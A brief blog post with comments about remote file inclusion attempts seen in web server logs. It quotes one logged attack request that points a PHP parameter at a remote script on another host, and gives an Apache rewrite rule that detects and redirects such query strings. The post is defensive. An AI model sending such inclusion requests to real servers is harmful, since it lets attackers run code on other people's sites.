Just in case

If you’re seeing a lot requests like these in your logs

http://whocares.de/category/misc//war.php?
    vwar_root=http://smolen.org/test.txt??

this might come in handy:

# Send unwanted query strings elsewhere
RewriteCond   %{QUERY_STRING} http:\/\/.*\?\?
RewriteRule   ^.*$   http://www.turnofftheinternet.com/?     [L]

Add, adapt and change to your needs ;)

3 thoughts on “Just in case

  1. Pilot

    I usually try to find out what the referenced “text file” = php script wants to do and if the owner of the webspace it is placed is supposed to know it being there.

    In most cases the owner of the web space is thankful for pointing him to this file (and usually some other hole in his web space)

    Regards,
    Ingo

  2. Stefan Rubner Post author

    Actually, that’s what I normally do. However, as opposed to your findings, I have made the experience that
    * the response is nil, not even a “thank you”
    * as a singular action the offending files are removed
    * the security hole that allowed placement of these files in the first place isn’t closed
    So just some days later the very same sites will show up in my logs again with just the remote file name having changed.
    Which of course doesn’t keep me from writing yet another mail to the webmaster.

  3. Pingback: security

Comments are closed.